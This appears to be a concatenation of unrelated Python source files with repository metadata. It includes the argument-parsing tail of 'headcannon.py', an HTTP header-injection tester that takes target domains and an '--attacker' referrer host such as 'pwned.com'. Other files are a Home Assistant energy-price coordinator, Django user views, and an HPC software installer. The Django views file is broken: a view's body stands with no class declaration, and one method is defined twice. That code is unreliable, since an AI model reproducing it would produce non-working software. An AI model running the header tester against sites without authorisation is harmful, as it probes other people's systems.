    init()
    # show the leet banner
    print(banner.format(Fore.CYAN, Fore.MAGENTA, Style.RESET_ALL, Fore.MAGENTA,
                        Fore.CYAN, Style.RESET_ALL))
    # start the async loop and block until every target has been tested
    loop = asyncio.get_event_loop()
    future = asyncio.ensure_future(run_ansync())
    loop.run_until_complete(future)
if __name__ == '__main__':
    # Bail out with a hint when invoked with no arguments at all.
    if len(sys.argv) < 2:
        print('try ./headcannon.py --help')
        exit(0)
    parser = argparse.ArgumentParser(description="HTTP Header Tester idk")
    # Exactly one of --domain / --list must be supplied.
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument('-d', '--domain', metavar='', help='Domain to target')
    group.add_argument('-l', '--list', metavar='', help='Specify list of domains to targets')
    parser.add_argument('-a', '--attacker', required=True, metavar='', help='Url of referrer (ex: pwned.com)')
    parser.add_argument('-w', '--workers', type=int, metavar='', default=10, help='Max number of concurrent workers (default 10)')
    parser.add_argument('-s', '--ssl', action='store_true', default=False, help='Use https instead of http')
    parser.add_argument('-t', '--timeout', type=int, metavar='', default=5, help='Specify request timeout (default 5 sec)')
    parser.add_argument('-r', '--retries', type=int, metavar='', default=5, help='Specify max retries (default 5)')
    parser.add_argument('-p', '--proxy', metavar='', help='Specify proxy (127.0.0.1:8080 or user:pass@127.0.0.1:8080)')
    parser.add_argument('-v', '--verbose', action='store_true', help='Enable verbose output')
    # `args` and `proxies` are module globals read directly by test_url().
    args = parser.parse_args()
    if args.proxy:
        proxies = {'http': args.proxy, 'https': args.proxy}
    else:
        proxies = None
    main()
| 42.542683 | 148 | 0.603411 |
7d492325c23b5555dc0e02ca4b4a7c9305ec3e1a | 734 | py | Python | scripts/startup_herb.py | papallas/or_urdf | 31b3b2f1efd4a504c16df83910105643c2af031a | [
"BSD-3-Clause"
] | 21 | 2015-06-03T08:19:06.000Z | 2022-02-11T17:39:28.000Z | scripts/startup_herb.py | papallas/or_urdf | 31b3b2f1efd4a504c16df83910105643c2af031a | [
"BSD-3-Clause"
] | 28 | 2015-03-23T15:54:44.000Z | 2020-02-29T17:28:33.000Z | scripts/startup_herb.py | papallas/or_urdf | 31b3b2f1efd4a504c16df83910105643c2af031a | [
"BSD-3-Clause"
] | 28 | 2015-04-17T11:47:21.000Z | 2021-11-23T03:13:41.000Z | #!/usr/bin/env python
#
# Loads a URDF to test the loader.
#
import os;
# Get this script path (in or_urdf) and add it to the openrave path
# so OpenRAVE can discover the locally built 'urdf' plugin under ./lib.
or_urdf_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'lib')
or_plugin_path = os.getenv('OPENRAVE_PLUGINS', '')
os.environ['OPENRAVE_PLUGINS'] = os.pathsep.join([or_urdf_path, or_plugin_path])
# Import only after OPENRAVE_PLUGINS is set, so the plugin path takes effect.
import openravepy
env = openravepy.Environment()
env.SetViewer('qtcoin')
# Load the URDF plugin module and ask it to load a robot description.
plugin = openravepy.RaveCreateModule(env, "urdf")
plugin.SendCommand("load /homes/pkv/ros/local/systemconf/herb2.urdf")
# Alternative test robots (kept for reference):
#plugin.SendCommand("load /homes/pkv/ros/local/apps/librarian/tema_tim_description/robots/tim/tim.urdf")
#plugin.SendCommand("load /homes/pkv/ros/local/herb_urdf/robots/herb_urdf.URDF")
6db1d529fb366ce6b3cd7bdc7cbefc9b53cad844 | 4,168 | py | Python | homeassistant/components/amberelectric/coordinator.py | colemamd/home-assistant | 718f8d8bf796e9bb7cbdc29a7f2d19d79e9f5927 | [
"Apache-2.0"
] | 1 | 2022-03-21T01:52:23.000Z | 2022-03-21T01:52:23.000Z | homeassistant/components/amberelectric/coordinator.py | ehendrix23/home-assistant | 0044fa9fb9794dad5290a431b5f339640748e477 | [
"Apache-2.0"
] | 75 | 2020-08-05T07:22:42.000Z | 2022-03-23T21:54:57.000Z | homeassistant/components/amberelectric/coordinator.py | colemamd/home-assistant | 718f8d8bf796e9bb7cbdc29a7f2d19d79e9f5927 | [
"Apache-2.0"
] | null | null | null | """Amber Electric Coordinator."""
from __future__ import annotations
from datetime import timedelta
from typing import Any
from amberelectric import ApiException
from amberelectric.api import amber_api
from amberelectric.model.actual_interval import ActualInterval
from amberelectric.model.channel import ChannelType
from amberelectric.model.current_interval import CurrentInterval
from amberelectric.model.forecast_interval import ForecastInterval
from homeassistant.core import HomeAssistant
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator, UpdateFailed
from .const import LOGGER
# Predicates classifying Amber API intervals: first two by interval class,
# last three by the tariff channel the interval belongs to.
def is_current(interval: ActualInterval | CurrentInterval | ForecastInterval) -> bool:
    """Return true if the supplied interval is a CurrentInterval."""
    return isinstance(interval, CurrentInterval)


def is_forecast(interval: ActualInterval | CurrentInterval | ForecastInterval) -> bool:
    """Return true if the supplied interval is a ForecastInterval."""
    return isinstance(interval, ForecastInterval)


def is_general(interval: ActualInterval | CurrentInterval | ForecastInterval) -> bool:
    """Return true if the supplied interval is on the general channel."""
    return interval.channel_type == ChannelType.GENERAL


def is_controlled_load(
    interval: ActualInterval | CurrentInterval | ForecastInterval,
) -> bool:
    """Return true if the supplied interval is on the controlled load channel."""
    return interval.channel_type == ChannelType.CONTROLLED_LOAD


def is_feed_in(interval: ActualInterval | CurrentInterval | ForecastInterval) -> bool:
    """Return true if the supplied interval is on the feed in channel."""
    return interval.channel_type == ChannelType.FEED_IN
class AmberUpdateCoordinator(DataUpdateCoordinator):
    """Download Amber price data for one site; the site's sensors all read from here."""

    def __init__(
        self, hass: HomeAssistant, api: amber_api.AmberApi, site_id: str
    ) -> None:
        """Initialise the data service."""
        super().__init__(
            hass,
            LOGGER,
            name="amberelectric",
            update_interval=timedelta(minutes=1),
        )
        self._api = api
        self.site_id = site_id

    def update_price_data(self) -> dict[str, dict[str, Any]]:
        """Fetch prices and bucket them by channel.

        Returns a dict with "current", "forecasts" and "grid" sections.
        Raises UpdateFailed when the API call fails or the site exposes no
        general channel.
        """
        result: dict[str, dict[str, Any]] = {
            "current": {},
            "forecasts": {},
            "grid": {},
        }
        try:
            # next=48 asks for 48 future intervals alongside the current ones.
            data = self._api.get_current_price(self.site_id, next=48)
        except ApiException as api_exception:
            raise UpdateFailed("Missing price data, skipping update") from api_exception
        current = [interval for interval in data if is_current(interval)]
        forecasts = [interval for interval in data if is_forecast(interval)]
        general = [interval for interval in current if is_general(interval)]
        # Idiom fix: truthiness test instead of len(...) == 0.
        if not general:
            raise UpdateFailed("No general channel configured")
        result["current"]["general"] = general[0]
        result["forecasts"]["general"] = [
            interval for interval in forecasts if is_general(interval)
        ]
        result["grid"]["renewables"] = round(general[0].renewables)
        # Controlled-load and feed-in channels are optional per site.
        controlled_load = [
            interval for interval in current if is_controlled_load(interval)
        ]
        if controlled_load:
            result["current"]["controlled_load"] = controlled_load[0]
            result["forecasts"]["controlled_load"] = [
                interval for interval in forecasts if is_controlled_load(interval)
            ]
        feed_in = [interval for interval in current if is_feed_in(interval)]
        if feed_in:
            result["current"]["feed_in"] = feed_in[0]
            result["forecasts"]["feed_in"] = [
                interval for interval in forecasts if is_feed_in(interval)
            ]
        LOGGER.debug("Fetched new Amber data: %s", data)
        return result

    async def _async_update_data(self) -> dict[str, Any]:
        """Async update wrapper: run the blocking fetch in the executor."""
        return await self.hass.async_add_executor_job(self.update_price_data)
| 37.54955 | 108 | 0.683781 |
2575f74c30355a567d1f2ced3029af5571029521 | 734 | py | Python | script.py | Ragug/photo-editor | 3045b0d7a289e1da09ad8fe61744e66916a89cf2 | [
"MIT"
] | null | null | null | script.py | Ragug/photo-editor | 3045b0d7a289e1da09ad8fe61744e66916a89cf2 | [
"MIT"
] | null | null | null | script.py | Ragug/photo-editor | 3045b0d7a289e1da09ad8fe61744e66916a89cf2 | [
"MIT"
] | null | null | null | class script(object):
START_MSG = """ <b>Hi {}
I'm a Image Editor Bot which Supports various modes
For more click help....</b>"""
HELP_MSG = """Hi, Follow these Steps..
<code>🌀 Send me any Image to Edit..</code>
<code>🌀 Select the Corresponding mode that you need</code>
<code>🌀 Your Edited Image will be Uploaded </code>
<code>🌀 you can get telegram sticker package on my Instagram story highlights check there </code>
© Made by RAGU G"""
ABOUT_MSG = """⭕️<b>My Name : RAGU</b>
⭕️<b>INSTAGRAM I'd : ragug19</b>
⭕️<b>INSTAGRAM link 🔗:</b> 👉 <a href='https://www.instagram.com/ragug19?r=nametag'>Click Here</a>
⭕️<b>Report Bugs 😊 :</b> 👉 <a href='https://www.instagram.com/ragug19?r=nametag'>Click Here</a>"""
| 27.185185 | 99 | 0.653951 |
c68a81cc235de75ee52c5e12fa2d32b55889f5e1 | 735 | py | Python | userarea/forms/keygroup.py | eieste/SSHock | 04bcbb2593e104c0ecb1b5dc9b79b19b4681c96b | [
"MIT"
] | null | null | null | userarea/forms/keygroup.py | eieste/SSHock | 04bcbb2593e104c0ecb1b5dc9b79b19b4681c96b | [
"MIT"
] | 2 | 2019-12-13T08:06:34.000Z | 2020-06-05T19:46:47.000Z | userarea/forms/keygroup.py | eieste/SSHock | 04bcbb2593e104c0ecb1b5dc9b79b19b4681c96b | [
"MIT"
] | null | null | null | from django import forms
from superarea.models import PublishGroup
from userarea.models import KeyGroup
class KeyGroupCreateForm(forms.ModelForm):
    """Create a KeyGroup; the internal name mirrors the user-facing display name."""

    class Meta:
        fields = ("display_name",)
        model = KeyGroup

    def clean(self):
        # Fix: run the parent validation first so cleaned_data is fully
        # populated (Django docs recommend always calling super().clean()).
        cleaned_data = super().clean()
        # Derive the internal name from the display name.
        cleaned_data['name'] = cleaned_data["display_name"]
        return cleaned_data
class AssignKeyGroupToPublicKeyForm(forms.Form):
    """Select the key groups a public key should belong to."""

    # Queryset is an empty placeholder - presumably narrowed per-user by the view; confirm.
    key_groups = forms.ModelMultipleChoiceField(queryset=KeyGroup.objects.none(), required=False)


class AssignPublishGroupToKeyGroupForm(forms.Form):
    """Select the publish groups a key group is published to."""

    # Identifier used by templates to tell multiple forms on one page apart.
    template_form_name = "assign_publishgroup_to_keygroup_form"
    # Queryset is an empty placeholder - presumably narrowed per-user by the view; confirm.
    publish_groups = forms.ModelMultipleChoiceField(required=False, queryset=PublishGroup.objects.none())
5d81c228868b22db6dbca44b829820e764d173c9 | 5,657 | py | Python | bilalcoin/users/views.py | jphaser/bilalcoin | 31d8b466912e009c31615b0b1df1afe68ab4bdb8 | [
"MIT"
] | null | null | null | bilalcoin/users/views.py | jphaser/bilalcoin | 31d8b466912e009c31615b0b1df1afe68ab4bdb8 | [
"MIT"
] | 1 | 2022-03-31T03:16:16.000Z | 2022-03-31T03:16:16.000Z | bilalcoin/users/views.py | jphaser/bilalcoin | 31d8b466912e009c31615b0b1df1afe68ab4bdb8 | [
"MIT"
] | null | null | null | from __future__ import absolute_import
import requests
from django.conf import settings
from django.contrib import messages
from django.contrib.auth import get_user_model
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.messages.views import SuccessMessageMixin
from django.core.mail import EmailMessage, send_mail
from django.http import Http404
from django.shortcuts import get_object_or_404, redirect, render
from django.template.loader import get_template, render_to_string
from django.urls import reverse
from django.utils import timezone
from django.utils.translation import gettext_lazy as _
from django.views.generic import CreateView, DetailView, RedirectView, UpdateView
from .forms import UserPersonalForm, UserProfileForm, UserVerifyForm
from .models import UserProfile, UserVerify
User = get_user_model()
def home(request, *args, **kwargs):
    """Render the landing page, recording a referral when the URL names a valid user."""
    username = str(kwargs.get('username'))
    try:
        user = User.objects.get(username=username)
        # Remember the referrer in the session so sign-up can credit them later.
        request.session['ref_profile'] = user.id
        print('user', user.id)
    except User.DoesNotExist:
        # Fix: was a bare `except: pass`, which also swallowed unrelated
        # errors (DB failures, KeyboardInterrupt). Only a missing referrer
        # is expected here and safely ignored.
        pass
    return render(request, 'pages/home.html', {})
class UserDetailView(LoginRequiredMixin, DetailView):
    """Read-only page for a single user, looked up by username slug."""

    model = User
    slug_field = "username"
    slug_url_kwarg = "username"


user_detail_view = UserDetailView.as_view()
model = UserProfile
form_class = UserProfileForm
# second_form_class = UserProfileForm
template_name = 'users/user_form.html'
success_message = _("Your personal information was successfully updated")
slug_field = "username"
slug_url_kwarg = "username"
def get_success_url(self):
return self.request.user.get_absolute_url() # type: ignore [union-attr]
def get_object(self):
self.user = self.request.user
return super().get_object()
def get_object(self):
username = self.kwargs.get('username')
if username is None:
raise Http404
return get_object_or_404(UserProfile, user__username__iexact=username)
def get(self, request, *args, **kwargs):
self.user = request.user
return super().get(request, *args, **kwargs)
# def get_context_data(self, **kwargs):
# context = super().get_context_data(**kwargs)
# context["profileform"] = self.form_class(self.request.POST, self.request.FILES, instance=self.request.user)
# return context
def form_valid(self, form):
form.save()
time = timezone.now()
userdata = self.request.user
title = "User Data Update"
msg = f"{userdata.username} just updated his personal details at {time}"
message = get_template('mail/admin-mail.html').render(context={"user_username": userdata.username, "title": title, "time": time, "message": msg})
recepient = str(userdata.email)
frm = settings.EMAIL_HOST_USER
mail = EmailMessage(
title,
#f"{self.request.user.username} just updated his profile at {self.created}",
message,
frm,
[recepient],
)
mail.content_subtype = "html"
mail.send()
return super().form_valid(form)
def form_invalid(self, form):
return messages.error(self.request, "Form was not submited successfully. Check your informations!")
user_update_view = UserUpdateView.as_view()
class UserRedirectView(LoginRequiredMixin, RedirectView):
    """Redirect the logged-in user to their own detail page."""

    permanent = False  # temporary (302) redirect

    def get_redirect_url(self):
        return reverse("users:detail", kwargs={"username": self.request.user.username})


user_redirect_view = UserRedirectView.as_view()
class UserVerifyCreateView(LoginRequiredMixin, SuccessMessageMixin, UpdateView):
    """Submit/update identity-verification data for the user named in the URL.

    NOTE(review): named "CreateView" but implemented as an UpdateView over an
    existing UserVerify row - confirm the record is created elsewhere.
    """

    model = UserVerify
    form_class = UserVerifyForm
    template_name = 'users/verify.html'
    slug_field = "username"
    slug_url_kwarg = "username"
    success_message = _("Verification information was successfully created")

    def get_success_url(self):
        """Send the user back to their detail page."""
        return self.request.user.get_absolute_url()  # type: ignore [union-attr]

    def get_object(self):
        """Resolve the UserVerify row from the URL's username (404 when absent)."""
        username = self.kwargs.get('username')
        if username is None:
            raise Http404
        return get_object_or_404(UserVerify, user__username__iexact=username)

    def get(self, request, *args, **kwargs):
        # Cache the requesting user for use elsewhere in the view.
        self.user = request.user
        return super().get(request, *args, **kwargs)

    def form_valid(self, form):
        """Save the form, then e-mail a verification-request notification."""
        form.save()
        time = timezone.now()
        title = "New Verification Request"
        msg = f"{self.request.user.username} just submited informations for his profile verification at {time}"
        message = get_template('mail/admin-mail.html').render(context={"user_username": self.request.user.username, "title": title, "time": time, "message": msg})
        recepient = self.request.user.email
        sender = settings.EMAIL_HOST_USER
        mail = EmailMessage(
            title,
            message,
            sender,
            [recepient]
        )
        mail.content_subtype = "html"  # send the rendered template as HTML
        mail.send()
        return super().form_valid(form)

    def form_invalid(self, form):
        """Flash an error and re-render the bound form with its errors.

        Fix: previously returned messages.error(...) which is None, breaking
        Django's contract that form_invalid returns an HttpResponse.
        """
        messages.error(self.request, "Form was not submited successfully. Check your informations!")
        return super().form_invalid(form)


user_verify_view = UserVerifyCreateView.as_view()
| 34.284848 | 162 | 0.680219 |
a39ba18e256682f836ba55e07629a3a054229a06 | 26,490 | py | Python | hpcinstall.py | NCAR/HPCinstall | e70e984305bfc6c54725601bb14ce5f499e65bc9 | [
"BSD-3-Clause"
] | 5 | 2017-09-15T22:25:15.000Z | 2019-04-08T22:44:00.000Z | hpcinstall.py | NCAR/HPCinstall | e70e984305bfc6c54725601bb14ce5f499e65bc9 | [
"BSD-3-Clause"
] | 15 | 2017-03-08T21:42:19.000Z | 2019-04-22T20:04:26.000Z | hpcinstall.py | NCAR/HPCinstall | e70e984305bfc6c54725601bb14ce5f499e65bc9 | [
"BSD-3-Clause"
] | 4 | 2017-05-02T15:36:25.000Z | 2022-03-29T19:39:57.000Z | #!/usr/bin/env python
import argparse, os, stat, shutil, sys, subprocess, yaml, datetime, re, glob
from collections import namedtuple, OrderedDict
import tee, hashdir
import blessed
term = blessed.Terminal()
# Log files written into the build directory by every HPCinstall run.
HPCi_log = "hpci.main.log"
env_log = "hpci.env.log"
module_log = "hpci.modules.log"
# Recognised keys of config.hpcinstall.yaml, grouped by how they are handled:
# directories to normalize, mandatory install-structure keys, optional extras.
config_options = {'list_of_dirs': ['scratch_tree', 'sw_install_dir', 'mod_install_dir'],
                  'install_struct': ['sw_install_struct', 'mod_install_struct' ],
                  'optional': ['python_cmd', 'script_repo', 'git_cmd', 'use_modules'],
                 }
def print_invocation_info():
    """Print who invoked HPCinstall, when, from where, and with what arguments.

    Strips the internal --nossh flag (and its optional sudo-user value) from
    the echoed command line.  Exits with status 2 on a malformed invocation.
    """
    if os.environ['USER'] == "csgteam":
        running_user = "csgteam (invoked by " + os.environ['SUDO_USER'] + ")"
    else:
        running_user = os.environ['USER']
    print term.bold_magenta("On " + str(datetime.datetime.now().isoformat()) + " " + running_user)
    print term.bold_magenta("called HPCinstall from " + os.path.realpath(__file__))
    print term.bold_magenta("invoked as"),
    arguments = list(sys.argv)
    try:
        # Remove the internal --nossh flag; it must always be present here.
        ssh_position = arguments.index("--nossh")
        arguments.pop(ssh_position)
    except ValueError:
        print >> sys.stderr, term.bold_red("INTERNAL ERROR: Wrong ssh invocation, please report it to https://github.com/NCAR/HPCinstall/issues/")
        sys.exit(2)
    try:
        # Remove the value that followed --nossh (now shifted into its slot).
        arguments.pop(ssh_position) # was ssh_position + 1
    except IndexError:
        pass # sudo user is optional
    # Print arguments verbatim when shell-safe, otherwise as a Python list.
    simple = True
    for arg in arguments:
        if " " in arg or "'" in arg or '"' in arg or "\\" in arg:
            simple = False
    if simple:
        print " ".join(arguments)
    else:
        print arguments
    print # emtpy line
def parse_config_data(yaml_data):
    """Turn the YAML config stream into a dict of normalized settings.

    Directory values are ~/- and $VAR-expanded, made absolute and given a
    trailing slash; install-structure keys are mandatory; optional keys are
    copied through when present.  Raises KeyError when the config is empty
    or a mandatory key is missing.
    """
    config = yaml.safe_load(yaml_data)
    if not config:
        raise KeyError(config_options['list_of_dirs'] + config_options['install_struct'])
    settings = {}
    for key in config_options['list_of_dirs']:
        # expanduser first, then expandvars, then absolutize.
        expanded = os.path.expandvars(os.path.expanduser(config[key]))
        settings[key] = os.path.abspath(expanded) + "/"
    for key in config_options['install_struct']:   # mandatory
        settings[key] = config[key]
    settings['use_modules'] = True                 # default, unless listed as optional below
    for key in config_options['optional']:
        if key in config:
            settings[key] = config[key]
    return settings
def parse_installscript_filename(filename):
    """Split a '<build>-<software>-<version>' filename into (software, version).

    Prints an error and exits with status 1 when the name does not follow the
    scheme or the version is not dot-separated digits.
    """
    parts = filename.split("-")
    valid = len(parts) >= 3
    if valid:
        try:
            # Version must reduce to a non-negative integer once dots are stripped.
            valid = int(parts[2].replace(".", "")) >= 0
        except ValueError:
            valid = False
    if not valid:
        print >> sys.stderr, term.bold_red("The software name and version must be specified as <build-software-version>. Got '" + filename + "' instead.")
        print >> sys.stderr, term.bold_red("Or you may use any filename, by including #HPCI -n software' and '#HPCI -v version' directives")
        sys.exit(1)
    return parts[1], parts[2]
# Compiled once at import time; recompiling the pattern on every call was
# wasted work.  Regex adapted from Django's URLValidator, localhost removed.
_URL_RE = re.compile(
    r'^(?:http|ftp)s?://' # http:// or https://
    r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' #domain...
    r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
    r'(?::\d+)?' # optional port
    r'(?:/?|[/?]\S+)$', re.IGNORECASE)

def validate_url(u):
    """Return a match object when u looks like an http(s)/ftp(s) URL, else None."""
    return _URL_RE.match(u)
def get_modules_in_script(install_script_str):
    """Extract the module directives from an install script.

    Returns (failed, modules_to_load, modules_prereq).  failed is 1 when the
    script still uses the deprecated anonymous '#HPCI foo' directive instead
    of the named '#HPCI -x foo' form.
    """
    failed = 0
    # legacy_stuff: anonymous '#HPCI foo' directives; stuff: named '-x' ones.
    legacy_stuff = parse_installscript_for_directives(install_script_str)
    stuff = parse_installscript_for_directives(install_script_str, "-")
    if len(stuff) == 0:
        modules_to_load = ""
        modules_prereq = ""
        if len(legacy_stuff) > 0:
            print >> sys.stderr, term.bold_red("Deprecation ERROR: The anonymous '#HPCI foo' directive is deprecated.")
            print >> sys.stderr, term.bold_red(" Must use the named '#HPCI -x foo' directive instead.")
            failed = 1
    else:
        # A mix of anonymous and named directives is also an error.
        if len(legacy_stuff) != len(stuff):
            print >> sys.stderr, term.bold_red("ERROR: anoymous '#HPCI foo' directives are not supported anymore")
            print >> sys.stderr, term.bold_red(" use '#HPCI -x foo' directives instead.")
            failed = 1
        modules_to_load, modules_prereq = parse_installscript_for_modules(install_script_str)
    return failed, modules_to_load, modules_prereq
def get_config_data(env_sudo_user): # sudo_user is dependency only via environmental variable, adding pseudo-dependency here
failed = 0
config_filename = ( os.path.dirname(os.path.realpath(__file__)) + # directory where this script is
"/config.hpcinstall.yaml" )
try:
defaults = parse_config_data(open(config_filename))
except KeyError, e:
print >> sys.stderr, term.bold_red("Error: " + config_filename + " does not contain the expected fields"), e.args[0]
failed = 1
except IOError as e:
print >> sys.stderr, e
print >> sys.stderr, term.bold_red("Cannot read " + config_filename + " -- ABORTING")
failed = 1
return failed, defaults
def test_modules(modules_to_load, debug, script_name):
    """Verify that the modules requested by script_name can actually be loaded.

    Returns 0 on success, 1 when `subcall` reports a load failure.
    """
    failed = 0
    if subcall(modules_to_load, # try loading modules
               stop_on_errors=True, # stop at the first failure
               debug=debug, # use specified debug level
               ) != 0:
        print >> sys.stderr, term.bold_red("Modules from " + script_name + " are not loadable:")
        print >> sys.stderr, modules_to_load
        failed = 1
    return failed
def check_sudo_user(nossh, req_csgteam, arg_sudo_user):
    """Reconcile the sudo user from the environment and the command line.

    Returns (failed, sudo_user).  failed counts the cases where a csgteam
    install cannot be attributed to a real user.
    NOTE(review): when nossh is true, SUDO_USER is unset and no argument was
    passed, sudo_user is returned as None rather than "" - confirm callers
    handle that.
    """
    failed = 0
    if nossh:
        env_sudo_user = os.environ.get('SUDO_USER', '')
        if arg_sudo_user is not None:
            if env_sudo_user == '':
                # Propagate the command-line value into the environment.
                os.environ['SUDO_USER'] = arg_sudo_user
            else:
                # Both sources set: they must agree for a csgteam install.
                if env_sudo_user != arg_sudo_user and req_csgteam:
                    print >> sys.stderr, term.bold_red("ERROR: Can't figure out the actual user invoking csgteam")
                    failed += 1
        else:
            # no need to store in env, since it was there already
            arg_sudo_user = env_sudo_user
        if arg_sudo_user == "" and req_csgteam:
            print >> sys.stderr, term.bold_red("ERROR: Can't figure out the actual user invoking csgteam")
            failed += 1
    else:
        arg_sudo_user = ""
    return failed, arg_sudo_user
def get_program_name_and_version(install_script_str, install_script_name):
    """Determine (failed, name, version) from '#HPCI -n' / '#HPCI -v'
    directives, falling back to parsing the install script's file name
    when either directive is absent.
    """
    failed = 0
    progname = parse_installscript_for_directives(install_script_str, "-n")
    progver = parse_installscript_for_directives(install_script_str, "-v")
    if len(progname) > 1 or len(progver) > 1:
        print >> sys.stderr, term.bold_red("'#HPCI -n software' and '#HPCI -v version' can't be specified more than once")
        failed += 1
    if len(progname) == 1 and len(progver) == 1:
        return failed, progname[0], progver[0]
    else:
        # parse_installscript_filename returns a (name, version) tuple
        return sum(((failed,), parse_installscript_filename(install_script_name)), ()) # tuple flattening
def parse_command_line_arguments(list_of_files):
    """Parse argv, validate every '#HPCI' directive of the install script,
    and return the fully populated argparse namespace.

    Readable tarballs named by '#HPCI -a' directives are appended to
    `list_of_files`.  On any validation failure the help text is printed
    and the process exits with status 1.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("install_script", metavar="install-software-ver", type=argparse.FileType('r'),
                        help="script in the current directory which\n" +
                             " does the build and install (do not use\n" +
                             " './', relative nor fully qualified paths)")
    parser.add_argument("-c", "--csgteam", action="store_true", default=False, help='Install as csgteam (default: False)')
    parser.add_argument("-f", "--force", action="store_true", default=False, help='Force overwrite of existing install (default: False)')
    parser.add_argument("-d", "--debug", action="store_true", default=False, help='Debug mode i.e. more verbose output (default: False)')
    parser.add_argument("-p", "--preserve", action="store_true", default=False, help='Preserve current environment - not valid with --csgteam (default: False)')
    parser.add_argument("--bypass-prompt", action="store_true", default=False, help='Bypass prompt when installing as --csgteam (default: False)')
    parser.add_argument("--nossh", nargs='?', help=argparse.SUPPRESS) # Never manually invoke this
    # do not add a command line argument named defaults, because it will be overridden (see below)
    # do not add a command line argument named modules-to-load or modules_to_load, because it will be overridden (see below)
    # do not add a command line argument named urls, because it will be overridden (see below)
    # do not add a command line argument named tarballs, because it will be overridden (see below)
    # do not add a command line argument named prog, because it will be overridden (see below)
    # do not add a command line argument named vers, because it will be overridden (see below)
    # do not add a command line argument named prereq, because it will be overridden (see below)
    # do not add a command line argument named sudo-user or sudo_user, because it will be overridden (see below)
    num_failures = 0
    try:
        args = parser.parse_args()
    except IOError, e:
        print >> sys.stderr, term.bold_red("Troubles accessing <install-software-ver> file")
        print >> sys.stderr, e
        print
        parser.print_help()
        sys.exit(1) # can't try most of the following
    install_script_str = args.install_script.read()
    failed, args.modules_to_load, args.prereq = get_modules_in_script(install_script_str)
    num_failures += failed
    # Check who issued the ssh during execution step (not during initial pass)
    # and set related arguments
    really_csgteam = args.csgteam and os.environ['USER'] == "csgteam"
    arg_sudo_user = args.nossh
    args.nossh = "--nossh" in sys.argv
    failed, env_sudo_user = check_sudo_user(args.nossh, really_csgteam, arg_sudo_user)
    num_failures += failed
    failed, args.defaults = get_config_data(env_sudo_user)
    num_failures += failed
    # Make sure user doesn't preserve environment during system install
    if args.preserve and args.csgteam:
        print >> sys.stderr, term.bold_red("ERROR: preserve environment not allowed for system installation (-c).")
        num_failures += 1
    # Test requested modules during initial pass
    if not args.nossh:
        if args.defaults['use_modules']:
            num_failures += test_modules(args.modules_to_load, args.debug, args.install_script.name)
        else:
            args.modules_to_load = ""
    args.urls = parse_installscript_for_directives(install_script_str, "-u")
    for u in args.urls:
        if not validate_url(u):
            print >> sys.stderr, term.bold_red("URL specified in install script " + args.install_script.name + " is not a valid URL: " + u)
            num_failures += 1
    # Expand '#HPCI -a' tarball globs into absolute, readable paths
    tarballs = parse_installscript_for_directives(install_script_str, "-a")
    parsed_tarballs = []
    for tarball in tarballs:
        globbed_tarballs = glob.glob(tarball)
        if len(globbed_tarballs) == 0:
            print >> sys.stderr, term.bold_red("Cannot find tarball: " + tarball)
        for globbed_tarball in globbed_tarballs:
            t = os.path.abspath(os.path.expanduser(globbed_tarball))
            parsed_tarballs.append(t)
            if not os.access(t, os.R_OK):
                print >> sys.stderr, term.bold_red("Troubles accessing file: " + t)
                num_failures += 1
            else:
                list_of_files.append(t)
    args.tarballs = parsed_tarballs
    if len(args.urls) == 0 and len(args.tarballs) == 0:
        print >> sys.stderr, term.bold_red("ERROR: Either or both the '#HPCI -u URL' and '#HPCI -a source.tgz' must be provided")
        num_failures += 1
    failed, args.prog, args.vers = get_program_name_and_version(install_script_str, args.install_script.name)
    num_failures += failed
    args.clobber = False
    other_options = parse_installscript_for_directives(install_script_str, "-o")
    for one_opt in other_options:
        if one_opt == 'CLOBBER':
            ask_confirmation_for(True, "WARNING!!! This will clobber the existing directory. Continue anyway? ")
            args.clobber = True
        else:
            print >> sys.stderr, term.bold_red("Unsupported option #HPCI -o " + one_opt)
            num_failures += 1
    if num_failures > 0:
        print >> sys.stderr, "" # just an empty line to make the output more clear in case of errors
        parser.print_help()
        sys.exit(1)
    return args
def ask_confirmation_for(really, msg):
    """If `really` is truthy, print `msg` and require the user to type
    exactly 'yes' (case-insensitive) on stdin; any other answer aborts
    the whole program with exit status 1.
    """
    if really:
        print msg,
        answer = sys.stdin.readline()
        print
        if answer.lower().strip() != "yes":
            print >> sys.stderr, term.bold_red("You did not say an enthusiastic 'yes', aborting...")
            sys.exit(1)
def get_prefix_and_moduledir(options, bin_dep, mod_dep):
    """Compute install and modulefile directories for the requested install.

    For csgteam (system) installs these live under the configured
    sw_install_dir / mod_install_dir; otherwise under a per-user test
    tree (overridable via $HPCI_TEST_BASEPATH).  If the target prefix
    already exists the process exits, unless --force (delete after
    confirmation) or CLOBBER was requested.

    Returns a Directories namedtuple: prefix, basemoduledir,
    idepmoduledir, cdepmoduledir, relativeprefix (all with trailing '/').
    """
    default_dirs = options.defaults
    my_prog = options.prog + "/" + options.vers
    if options.csgteam:
        if os.environ['USER'] != "csgteam":
            ask_confirmation_for(options.csgteam, "Should sudo into 'csgteam' to install as such. Continue anyway? ")
        prefix = os.path.abspath(default_dirs["sw_install_dir"] + "/" + my_prog + "/" + bin_dep)
        moduledir = os.path.abspath(default_dirs["mod_install_dir"])
    else:
        if "HPCI_TEST_BASEPATH" in os.environ:
            basepath = os.environ['HPCI_TEST_BASEPATH']
        else:
            basepath = default_dirs["scratch_tree"] + "/test_installs/"
        prefix = os.path.abspath(basepath + "/" + my_prog + "/" + bin_dep)
        moduledir = os.path.abspath(basepath + "/modulefiles/")
    if os.path.exists(prefix):
        if not options.force and not options.clobber:
            print >> sys.stderr, term.bold_red("ERROR: Path already exists: " + prefix)
            sys.exit(1)
        if options.force:
            # typo fix: message previously read "speficied"
            ask_confirmation_for(options.csgteam, "WARNING: " + prefix +
                                 " already exists and you specified --force to delete it. Continue? ")
            shutil.rmtree(prefix)
    directories = namedtuple('Directories', ['prefix','basemoduledir','idepmoduledir','cdepmoduledir', 'relativeprefix'])
    if mod_dep == "":
        # NOTE(review): non-path sentinel value -- consumers must handle it
        cdep_dir = "not_compiler_dependent"
    else:
        cdep_dir = os.path.abspath(moduledir + "/" + mod_dep) + "/"
